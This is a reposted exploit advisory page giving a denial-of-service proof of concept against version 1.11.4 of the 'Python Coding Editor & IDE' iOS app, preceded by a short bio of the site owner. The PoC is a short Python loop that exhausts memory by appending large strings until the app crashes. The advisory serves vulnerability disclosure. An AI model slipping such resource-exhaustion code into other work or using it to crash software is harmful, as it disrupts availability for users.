Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

# Exploit Title: Python Coding Editor & IDE IOS app # Exploit Title: Python Coding Editor & IDE IOS app ( DOS )
# Date: 02/14/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage:
https://apps.apple.com/us/developer/cloudbit-d-o-o/id1387318660
# Software Link:
https://apps.apple.com/it/app/python-coding-editor-ide-app/id6444399635?l=en-GB
# Version: 1.11.4
# Tested on: IOS 18.3.1

POC:

1. Create a new file any name.py
2. Put the following code:


array = []
while True:
array.append("A" * 10000000)


3. Once you run the code the app will crash.
Social Media Share